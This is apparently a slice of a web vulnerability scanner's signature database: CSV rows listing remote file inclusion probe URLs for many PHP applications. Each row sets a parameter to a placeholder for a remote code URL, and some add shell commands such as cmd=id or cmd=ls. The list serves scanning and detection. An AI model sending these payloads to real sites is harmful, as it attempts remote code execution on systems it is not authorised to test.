"004816","https://gist.github.com/mubix/5d269c686584875015a2","c","/gpb/include/gpb.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004817","https://gist.github.com/mubix/5d269c686584875015a2","c","/graph.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004818","https://gist.github.com/mubix/5d269c686584875015a2","c","/gruppen.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004819","https://gist.github.com/mubix/5d269c686584875015a2","c","/handlers/email/mod.listmail.php?_PM_[path][handle]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004820","https://gist.github.com/mubix/5d269c686584875015a2","c","/handlers/page/show.php?sous_rep=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004821","https://gist.github.com/mubix/5d269c686584875015a2","c","/head.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004822","https://gist.github.com/mubix/5d269c686584875015a2","c","/header.inc.php?CssFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004823","https://gist.github.com/mubix/5d269c686584875015a2","c","/header.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004824","https://gist.github.com/mubix/5d269c686584875015a2","c","/header.php?wwwRoot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004825","https://gist.github.com/mubix/5d269c686584875015a2","c","/help.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004826","https://gist.github.com/mubix/5d269c686584875015a2","c","/help/index.php?show=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004827","https://gist.github.com/mubix/5d269c686584875015a2","c","/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004829","https://gist.github.com/mubix/5d269c686584875015a2","c","/hioxBannerRotate.php?hm=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004830","https://gist.github.com/mubix/5d269c686584875015a2","c","/hioxRandomAd.php?hm=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004831","https://gist.github.com/mubix/5d269c686584875015a2","c","/hioxstats.php?hm=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004832","https://gist.github.com/mubix/5d269c686584875015a2","c","/hioxupdate.php?hm=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004833","https://gist.github.com/mubix/5d269c686584875015a2","c","/home.php?a=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004834","https://gist.github.com/mubix/5d269c686584875015a2","c","/home.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004835","https://gist.github.com/mubix/5d269c686584875015a2","c","/home.php?pagina=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004836","https://gist.github.com/mubix/5d269c686584875015a2","c","/home/www/images/doc/index2.php?type=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004837","https://gist.github.com/mubix/5d269c686584875015a2","c","/home1.php?ln=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004838","https://gist.github.com/mubix/5d269c686584875015a2","c","/home2.php?ln=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004839","https://gist.github.com/mubix/5d269c686584875015a2","c","/hsList.php?subdir=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004840","https://gist.github.com/mubix/5d269c686584875015a2","c","/htdocs/gmapfactory/params.php?gszAppPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004841","https://gist.github.com/mubix/5d269c686584875015a2","c","/html/admin/modules/plugin_admin.php?_settings[pluginpath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004842","https://gist.github.com/mubix/5d269c686584875015a2","c","/hu/modules/reg-new/modstart.php?mod_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004843","https://gist.github.com/mubix/5d269c686584875015a2","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004844","https://gist.github.com/mubix/5d269c686584875015a2","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004845","https://gist.github.com/mubix/5d269c686584875015a2","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004846","https://gist.github.com/mubix/5d269c686584875015a2","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004847","https://gist.github.com/mubix/5d269c686584875015a2","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004848","https://gist.github.com/mubix/5d269c686584875015a2","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004849","https://gist.github.com/mubix/5d269c686584875015a2","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004850","https://gist.github.com/mubix/5d269c686584875015a2","c","/in.php?returnpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004851","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004852","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/config.inc.php?x[1]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004853","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/design.inc.php?dir[data]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004854","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/download_center_lite.inc.php?script_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004855","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/formmail.inc.php?script_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004856","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/gabarits.php?cfg_racine=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004857","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/header.inc.php?ficStyle=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004858","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/ifunctions.php?GLOBALS[phpQRootDir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004859","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/inc.php?cfg_racine=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004860","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/indexhead.php?fileloc=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004861","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/irayofuncs.php?irayodirhack=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004862","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/irayofuncs.php?irayodirhack=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004863","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/Smarty_Compiler.class.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004864","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.display_debug_console.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004865","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.load_plugins.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004866","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.load_resource_plugin.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004867","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.process_cached_inserts.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004868","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.process_compiled_include.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004869","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/libs/core/core.read_cache_file.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004870","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/linkbar.php?cfile=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004871","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/login.php?pathCGX=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004872","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/logingecon.php?pathCGX=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004873","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/ltdialogo.php?pathCGX=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004874","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/mtdialogo.php?pathCGX=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004875","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004876","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/prepend.inc.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004877","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/service.alert.inc.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004878","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/settings.php?inc_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004879","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/settings.ses.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004880","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/shows.inc.php?cutepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004881","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc/sige_init.php?SYS_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004882","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_group.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004883","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_group.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004884","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_manager.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004885","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_manager.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004886","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_newgroup.php.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004887","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_newgroup.php.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004888","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_smb_conf.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004889","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_smb_conf.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004890","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_user.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004891","https://gist.github.com/mubix/5d269c686584875015a2","c","/inc_user.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004892","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004893","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?gorumDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004894","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?myng_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004895","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?path=psp/user.php&site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004896","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004897","https://gist.github.com/mubix/5d269c686584875015a2","c","/include.php?sunPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004898","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/Beautifier/Core.php?BEAUT_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004899","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/HTML_oben.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004900","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/HTML_oben.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004901","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/SQuery/gameSpy2.php?libpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004902","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/bbs.lib.inc.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004903","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/class_yapbbcooker.php?cfgIncludeDirectory=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004904","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/classes.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004905","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/client.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004906","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/cls_headline_prod.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004907","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/cls_listorders.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004908","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/cls_viewpastorders.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004909","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/common.php?XOOPS_ROOT_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004910","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/common_functions.php?baros_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004911","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/config.inc.php?racine=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004912","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/copyright.php?tsep_config[absPath]=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004913","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/customize.php?l=@RFIURL&text=Hello%20World","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004915","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/default_header.php?script_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004916","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/define.php?INC_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004917","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/disp_form.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004918","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/disp_smileys.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004919","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/dom.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004920","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/dtd.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004921","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004922","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/engine/content/elements/menu.php?CONFIG[AdminPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004923","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/forms.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004924","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/global.php?pfad=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004925","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/header.php?cs_base_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004926","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/html/nettools.popup.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004927","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc.foot.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004928","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_ext/spaw/dialogs/table.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004929","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004930","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004931","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe1.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004932","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe1.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004933","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe3.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004934","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/inc_freigabe3.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004935","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/include_stream.inc.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004936","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/include_top.php?g_include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004937","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/includes.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004938","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/index.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004939","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/init.inc.php?G_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004940","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/issue_edit.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004941","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/lib/lib_slots.php?main_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004942","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/lib/lib_stats.php?main_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004943","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/lib/lib_users.php?main_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004944","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/little_news.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004945","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/livre_include.php?no_connect=lol&chem_absolu=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004946","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/loading.php?path_include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004947","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/mail.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004948","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/menu_builder.php?config[page_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004949","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004950","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/monitoring/engine/MakeXML.php?fileOreonConf=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004951","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/parser.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004952","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/IT.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004953","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/IT.php?basepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004954","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/ITX.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004955","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/ITX.php?basepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004956","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/IT_Error.php?basepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004957","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/pear/IT_Error.php?basepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004958","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/phpxd/phpXD.php?appconf[rootpath]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004959","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/prodler.class.php?sPath=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004960","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/scripts/export_batch.inc.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004961","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/scripts/run_auto_suspend.cron.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004962","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/scripts/send_email_cache.php?DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004963","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/startup.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004964","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/themes/themefunc.php?myNewsConf[path][sys][index]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004965","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/timesheet.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004966","https://gist.github.com/mubix/5d269c686584875015a2","c","/include/urights.php?CRM_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004967","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/admin_board2.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004968","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/admin_logger.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004969","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004970","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/ajax_listado.php?urlModulo=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004971","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004972","https://gist.github.com/mubix/5d269c686584875015a2","c","/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 